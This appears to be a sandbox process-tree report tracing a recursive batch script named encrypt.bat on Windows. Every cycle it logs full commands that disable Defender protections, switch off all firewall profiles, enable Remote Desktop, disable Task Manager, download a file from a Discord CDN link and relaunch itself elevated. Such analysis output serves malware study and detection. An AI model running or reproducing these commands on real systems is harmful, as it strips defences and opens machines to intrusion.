C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"44⤵PID:888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"44⤵PID:2488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"44⤵PID:4236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"44⤵PID:420
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable44⤵PID:2472
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE44⤵PID:3256
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off44⤵PID:2992
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off44⤵PID:1840
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off44⤵
- Modifies Windows Firewall
PID:3344
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off44⤵
- Modifies Windows Firewall
PID:3036
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off44⤵PID:2744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"44⤵PID:528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"44⤵PID:2072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"44⤵PID:4580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"44⤵PID:4928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"44⤵PID:1456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"44⤵PID:3716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"44⤵
- Blocklisted process makes network request
PID:3520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"44⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:912 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"45⤵PID:4300
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV146⤵PID:4236
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"46⤵PID:4580
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f46⤵PID:2800
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"46⤵PID:5048
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f46⤵PID:2696
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"46⤵PID:4600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"46⤵PID:880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"46⤵PID:2540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"46⤵PID:1968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"46⤵
- Command and Scripting Interpreter: PowerShell
PID:2916
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable46⤵PID:5100
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE46⤵PID:4180
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off46⤵PID:4116
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off46⤵PID:2992
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off46⤵
- Modifies Windows Firewall
PID:2524
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off46⤵PID:4088
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off46⤵
- Modifies Windows Firewall
PID:3392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"46⤵PID:4296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"46⤵PID:528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"46⤵PID:3336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"46⤵PID:4504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"46⤵PID:456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"46⤵PID:208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"46⤵PID:1232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"46⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:1136 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"47⤵PID:3320
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"48⤵PID:3260
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f48⤵PID:4484
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"48⤵PID:5048
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f48⤵PID:1252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"48⤵PID:4592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"48⤵PID:2936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"48⤵PID:804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"48⤵PID:2324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"48⤵PID:4108
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable48⤵PID:764
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE48⤵PID:2220
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off48⤵PID:2732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off48⤵PID:3240
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off48⤵PID:2072
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off48⤵
- Modifies Windows Firewall
PID:2004
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off48⤵PID:2524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"48⤵PID:1556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"48⤵PID:3344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"48⤵PID:2964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"48⤵PID:528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"48⤵PID:4108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"48⤵PID:4176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"48⤵
- Blocklisted process makes network request
PID:2740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"48⤵
- Command and Scripting Interpreter: PowerShell
PID:1632 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"49⤵PID:328
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"50⤵PID:2324
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f50⤵PID:736
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"50⤵PID:932
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f50⤵PID:1232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"50⤵PID:2704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"50⤵PID:4504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"50⤵
- Command and Scripting Interpreter: PowerShell
PID:3588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"50⤵PID:2276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"50⤵PID:3900
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable50⤵PID:3024
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE50⤵PID:4696
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off50⤵PID:5032
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off50⤵
- Modifies Windows Firewall
PID:2672
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off50⤵PID:2120
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off50⤵PID:2212
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off50⤵PID:3152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"50⤵PID:1584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"50⤵PID:4360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"50⤵PID:1624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"50⤵PID:4460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"50⤵PID:4976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"50⤵PID:1460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"50⤵
- Blocklisted process makes network request
PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"50⤵
- Command and Scripting Interpreter: PowerShell
PID:2176 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"51⤵PID:1748
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"52⤵PID:4180
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f52⤵PID:2776
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"52⤵PID:1624
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f52⤵PID:1400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"52⤵PID:1532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"52⤵PID:3024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"52⤵PID:2052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"52⤵PID:460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"52⤵PID:1276
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable52⤵PID:4808
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE52⤵PID:4240
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off52⤵PID:1228
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off52⤵PID:2968
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off52⤵
- Modifies Windows Firewall
PID:3436
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off52⤵PID:720
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off52⤵PID:4576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"52⤵PID:4444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"52⤵PID:1100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"52⤵PID:4504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"52⤵PID:2472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"52⤵PID:3344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"52⤵PID:4440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"52⤵
- Blocklisted process makes network request
PID:4904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"52⤵
- Command and Scripting Interpreter: PowerShell
PID:2524 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"53⤵PID:804
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"54⤵PID:2164
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f54⤵PID:3640
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"54⤵PID:1924
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f54⤵PID:4504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"54⤵PID:4208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"54⤵PID:4872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"54⤵PID:3344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"54⤵PID:4940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"54⤵PID:4088
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable54⤵PID:4504
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE54⤵PID:4492
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off54⤵PID:3076
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off54⤵PID:1000
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off54⤵PID:328
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off54⤵PID:2916
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off54⤵PID:2184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"54⤵PID:4208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"54⤵PID:4872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"54⤵PID:2752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"54⤵PID:5096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"54⤵PID:2856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"54⤵PID:3536
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"54⤵
- Blocklisted process makes network request
PID:836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"54⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:5060 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"55⤵PID:2996
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"56⤵PID:2704
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f56⤵PID:4484
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"56⤵PID:3344
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f56⤵PID:448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"56⤵PID:4376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"56⤵PID:912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"56⤵PID:616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"56⤵PID:4488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"56⤵PID:2292
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable56⤵PID:448
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE56⤵
- Modifies Windows Firewall
PID:3640
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off56⤵
- Modifies Windows Firewall
PID:4040
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off56⤵PID:2052
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off56⤵
- Modifies Windows Firewall
PID:3524
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off56⤵PID:3652
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off56⤵
- Modifies Windows Firewall
PID:3716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"56⤵PID:2676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"56⤵PID:4360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"56⤵PID:4660
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"56⤵PID:2780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"56⤵PID:320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"56⤵PID:4292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"56⤵
- Blocklisted process makes network request
PID:2872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"56⤵
- Command and Scripting Interpreter: PowerShell
PID:4524 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"57⤵PID:3240
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"58⤵PID:3060
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f58⤵PID:616
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"58⤵PID:2744
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f58⤵PID:420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"58⤵PID:2672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"58⤵PID:448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"58⤵PID:1748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"58⤵PID:4292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"58⤵PID:836
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable58⤵PID:4444
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE58⤵PID:2992
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off58⤵PID:2964
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off58⤵PID:2860
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off58⤵PID:2044
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off58⤵PID:2908
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off58⤵PID:804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"58⤵PID:4564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"58⤵PID:3640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"58⤵PID:2664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"58⤵PID:4808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"58⤵PID:3560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"58⤵PID:620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"58⤵
- Blocklisted process makes network request
PID:1340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"58⤵
- Command and Scripting Interpreter: PowerShell
PID:4152 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"59⤵PID:4376
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"60⤵PID:4284
-
-
